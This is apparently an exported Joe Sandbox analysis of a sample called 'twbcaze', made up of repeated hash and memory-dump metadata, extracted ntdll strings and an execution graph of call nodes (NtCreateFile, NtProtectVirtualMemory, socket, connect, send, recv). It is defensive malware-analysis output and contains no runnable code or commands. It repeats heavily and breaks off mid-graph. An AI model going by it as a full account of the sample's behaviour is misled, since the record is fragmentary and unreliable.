                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                          • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 008689FC
                                          • Kernel-MUI-Number-Allowed, xrefs: 008687E6
                                          • WindowsExcludedProcs, xrefs: 008687C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00868914
                                          • Kernel-MUI-Language-Allowed, xrefs: 00868827
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00893F12
                                          Strings
                                          • ExecuteOptions, xrefs: 00893F04
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0089E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00893EC4
                                          • Execute=1, xrefs: 00893F5E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0089E2FB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00893F75
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00893F4A
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2206
                                          Strings
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 008AEA22
                                            • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 0088146B
                                            • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 00881490
                                          • ___swprintf_l.LIBCMT ref: 0088156D
                                          Strings
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: c8c1e75baf3b4b07f8bf8ff56cd2444c68081f3e1631a2a9b9b59448fc05854d
                                          • Instruction ID: 1deb3199270f0a86f575477495d0f4aa9e2194a8744a1035c6e674077fdd1aff
                                          • Opcode Fuzzy Hash: c8c1e75baf3b4b07f8bf8ff56cd2444c68081f3e1631a2a9b9b59448fc05854d
                                          • Instruction Fuzzy Hash: 55219DB2A0021AABCB20AF6A9C499EB77ACFB15714F040525FD14E3241E774AF5487E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A22F4
                                          Strings
                                          • RTL: Re-Waiting, xrefs: 008A2328
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008A22FC
                                          • RTL: Resource at %p, xrefs: 008A230B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                          • Instruction ID: 846e5c138287798e3c49dc6e2b7f599e24e904b23faf8e6ba472c83feaf15288
                                          • Opcode Fuzzy Hash: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                          • Instruction Fuzzy Hash: 525126716007056BEF25EB2CCC81FA67398FF56760F114229FD04DB781EA64EC4187A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008A248D
                                          • RTL: Re-Waiting, xrefs: 008A24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008A24BD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                          • Instruction ID: fb35fb4b4d32b0e6d079d4938f495709c96b3e66186b61ee30ebb3c56d424afc
                                          • Opcode Fuzzy Hash: 527a6db6e530137deebc86510a2bf2dce64f1c1e9be2c672f8e75962c08dbba0
                                          • Instruction Fuzzy Hash: 18410570A00208ABDB34EBACCC85F6A77A8FF49720F208605F515EB6D1D674E94187A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: 558b2162ed6b93d0ba3fbfac3104352c126bb81a5c0d458ea2e27ef3e8345b7c
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 0E919032D0020AEBDF24DF59C8456AEBBB0FF55318F24C47AD519EA157E7309A81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: true
                                           • Associated: 00000007.00000002.363230284.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000910000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000920000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000924000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000927000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000930000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000007.00000002.363230284.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_820000_twbcaze.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: $$0
                                          • API String ID: 1302938615-389342756
                                          • Opcode ID: 9bb38a626df079887b5ec981eb0324a1365977a7c07d08b23fa8b604c1859ce3
                                          • Instruction ID: eee98adf26141483a244e8787bafa5704017ba20cbdc332d4265a7c39bf859cd
                                          • Opcode Fuzzy Hash: 9bb38a626df079887b5ec981eb0324a1365977a7c07d08b23fa8b604c1859ce3
                                          • Instruction Fuzzy Hash: C0917A30D05A8EAEDF249FB9C8452BDBBB0FF02314F1446AADBA1E6291C7744A45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                           Execution Coverage: 2.4%
                                           Dynamic/Decrypted Code Coverage: 0%
                                           Signature Coverage: 4.6%
                                           Total number of Nodes: 457
                                           Total number of Limit Nodes: 18
                                          execution_graph 13867 8ca7e0a 13868 8ca6942 13867->13868 13869 8ca7e45 NtProtectVirtualMemory 13868->13869 13870 8ca7e70 13869->13870 13951 8ca014a 13952 8ca0153 13951->13952 13957 8ca0174 13951->13957 13953 8ca2382 2 API calls 13952->13953 13955 8ca016c 13953->13955 13954 8ca01e7 13956 8c9b0f2 6 API calls 13955->13956 13956->13957 13957->13954 13959 8c9b1f2 13957->13959 13960 8c9b20f 13959->13960 13961 8c9b2c9 13959->13961 13962 8ca5f12 7 API calls 13960->13962 13964 8c9b242 13960->13964 13961->13957 13962->13964 13963 8c9b289 13963->13961 13966 8c9b0f2 6 API calls 13963->13966 13964->13963 13965 8c9c432 NtCreateFile 13964->13965 13965->13963 13966->13961 13848 8ca8a4d 13849 8ca8a53 13848->13849 13852 8c9c782 13849->13852 13851 8ca8a6b 13854 8c9c78f 13852->13854 13853 8c9c7ad 13853->13851 13854->13853 13856 8ca1662 13854->13856 13857 8ca166b 13856->13857 13863 8ca17ba 13856->13863 13858 8c9b0f2 6 API calls 13857->13858 13857->13863 13860 8ca16ee 13858->13860 13859 8ca1750 13862 8ca183f 13859->13862 13859->13863 13864 8ca1791 13859->13864 13860->13859 13861 8ca6f82 6 API calls 13860->13861 13861->13859 13862->13863 13865 8ca6f82 6 API calls 13862->13865 13863->13853 13864->13863 13866 8ca6f82 6 API calls 13864->13866 13865->13863 13866->13863 13744 8ca6f82 13745 8ca6fb8 13744->13745 13746 8ca35b2 socket 13745->13746 13747 8ca7081 13745->13747 13755 8ca7022 13745->13755 13746->13747 13748 8ca7134 13747->13748 13750 8ca7117 getaddrinfo 13747->13750 13747->13755 13749 8ca3732 connect 13748->13749 13753 8ca71b2 13748->13753 13748->13755 13749->13753 13750->13748 13751 8ca36b2 send 13754 8ca7729 13751->13754 13752 8ca77f4 setsockopt recv 13752->13755 13753->13751 13753->13755 13754->13752 13754->13755 13906 8c9edd9 13907 8c9edf0 13906->13907 13908 8ca2382 2 API calls 13907->13908 13909 8c9eecd 13907->13909 13908->13909 13485 8c9b2dd 13488 8c9b31a 13485->13488 13486 8c9b3fa 13487 8c9b328 SleepEx 13487->13487 13487->13488 
13488->13486 13488->13487 13492 8ca5f12 13488->13492 13501 8c9c432 13488->13501 13511 8c9b0f2 13488->13511 13496 8ca5f48 13492->13496 13493 8ca6134 13493->13488 13494 8ca6232 NtCreateFile 13494->13496 13495 8ca60e9 13498 8ca6125 13495->13498 13529 8ca5842 13495->13529 13496->13493 13496->13494 13496->13495 13517 8ca6f82 13496->13517 13537 8ca5922 13498->13537 13502 8c9c45b 13501->13502 13509 8c9c4c9 13501->13509 13503 8ca6232 NtCreateFile 13502->13503 13502->13509 13504 8c9c496 13503->13504 13505 8c9c4c5 13504->13505 13558 8c9c082 13504->13558 13506 8ca6232 NtCreateFile 13505->13506 13505->13509 13506->13509 13508 8c9c4b6 13508->13505 13567 8c9bf52 13508->13567 13509->13488 13512 8c9b109 13511->13512 13516 8c9b1d3 13511->13516 13572 8c9b012 13512->13572 13514 8ca6f82 6 API calls 13514->13516 13515 8c9b113 13515->13514 13515->13516 13516->13488 13518 8ca6fb8 13517->13518 13520 8ca7081 13518->13520 13528 8ca7022 13518->13528 13545 8ca35b2 13518->13545 13521 8ca7134 13520->13521 13523 8ca7117 getaddrinfo 13520->13523 13520->13528 13526 8ca71b2 13521->13526 13521->13528 13548 8ca3732 13521->13548 13523->13521 13525 8ca77f4 setsockopt recv 13525->13528 13526->13528 13551 8ca36b2 13526->13551 13527 8ca7729 13527->13525 13527->13528 13528->13496 13530 8ca586d 13529->13530 13554 8ca6232 13530->13554 13532 8ca5906 13532->13495 13533 8ca5888 13533->13532 13534 8ca6f82 6 API calls 13533->13534 13535 8ca58c5 13533->13535 13534->13535 13535->13532 13536 8ca6232 NtCreateFile 13535->13536 13536->13532 13538 8ca59c2 13537->13538 13539 8ca6232 NtCreateFile 13538->13539 13542 8ca59d6 13539->13542 13540 8ca5a9f 13540->13493 13541 8ca5a5d 13541->13540 13543 8ca6232 NtCreateFile 13541->13543 13542->13540 13542->13541 13544 8ca6f82 6 API calls 13542->13544 13543->13540 13544->13541 13546 8ca360a socket 13545->13546 13547 8ca35ec 13545->13547 13546->13520 13547->13546 13549 8ca376a 13548->13549 13550 8ca3788 connect 13548->13550 13549->13550 13550->13526 13552 8ca36e7 13551->13552 13553 
